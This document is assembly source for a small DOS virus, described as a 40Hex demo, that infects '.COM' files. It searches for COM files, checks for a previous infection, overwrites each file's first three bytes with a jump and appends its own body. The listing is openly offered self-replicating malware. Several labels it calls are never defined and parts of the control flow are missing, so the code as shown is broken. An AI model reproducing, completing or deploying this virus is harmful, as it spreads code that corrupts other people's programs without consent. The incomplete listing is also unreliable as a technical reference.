DumbVirus segment
  Assume    CS:DumbVirus
  Org 100h                 ; account for PSP
  ; Dumb Virus - 40Hex demo virus
  ; Assemble with TASM /m2
  Start:  db      0e9h     ; jmp duh
          dw      0
  ; This is where the virus starts
  duh:    call    next
  next:   pop     bp                   ; bp holds current location
          sub     bp, offset next      ; calculate net change
  ; Restore the original first three bytes
          lea     si, [bp+offset stuff]
          mov     di, 100h
  ; Put 100h on the stack for the retn later
  ; This will allow for the return to the beginning of the file
          push    di
  ; Change DTA from default (otherwise Findfirst/next will destroy
  ; commandline parametres
          lea     dx, [bp+offset dta]
          call    set_dta
          mov     ah, 4eh           ; Find first
          lea     dx, [bp+masker]   ; search for '*.COM',0
          xor     cx, cx            ; attribute mask - this is unnecessary
          int     21h
          jc      quit              ; Quit on error
  ; Open file for read/write
  ; Note: This fails on read-only files
          mov     ax, 3D02h
          lea     dx, [bp+offset dta+30] ; File name is located in DTA
          int     21h
          xchg    ax, bx
  ; Read in the first three bytes
          mov     ah, 3fh
          lea     dx, [bp+stuff]
          mov     cx, 3
          int     21h
  ; Check for previous infection
          mov     ax, word ptr [bp+dta+26]       ; ax = filesize
          mov     cx, word ptr [bp+stuff+1]      ; jmp location
          add     cx, eov - duh + 3              ; convert to filesize
          cmp     ax, cx                         ; if same, already infected
          jz      close                          ; so quit out of here
  ; Calculate the offset of the jmp
          sub     ax, 3                          ; ax = filesize - 3
          mov     word ptr [bp+writebuffer], ax
  ; Go to the beginning of the file
          xor     al, al
          call    f_ptr
  ; Write the three bytes
          mov     ah, 40h
          mov     cx, 3
          lea     dx, [bp+e9]
          int     21h
  ; Go to the end of the file
          mov     al, 2
          call    f_ptr
  ; And write the rest of the virus
          mov     ah, 40h
          mov     cx, eov - duh
          lea     dx, [bp+duh]
          int     21h
          mov     ah, 3eh
          int     21h
  ; Try infecting another file
          mov     ah, 4fh                        ; Find next
          jmp     short tryanother
  ; Restore the DTA and return control to the original program
  quit:   mov     dx, 80h                        ; Restore current DTA to
                                                 ; the default @ PSP:80h
          mov     ah, 1ah                        ; Set disk transfer address
          int     21h
  f_ptr:  mov     ah, 42h
          xor     cx, cx
          cwd                                    ; equivalent to: xor dx, dx
          int     21h
  masker  db      '*.com',0
  ; Original three bytes of the infected file
  ; Currently holds a INT 20h instruction and a null byte
  stuff   db      0cdh, 20h, 0
  e9      db      0e9h
  eov equ $                                      ; End of the virus
  ; The following variables are stored in the heap space (the area between
  ; the stack and the code) and are not part of the virus that is written
  ; to files.
  writebuffer dw  ?                              ; Scratch area holding the
                                                 ; JMP offset
  dta         db 42 dup (?)
  DumbVirus    ENDS
               END     Start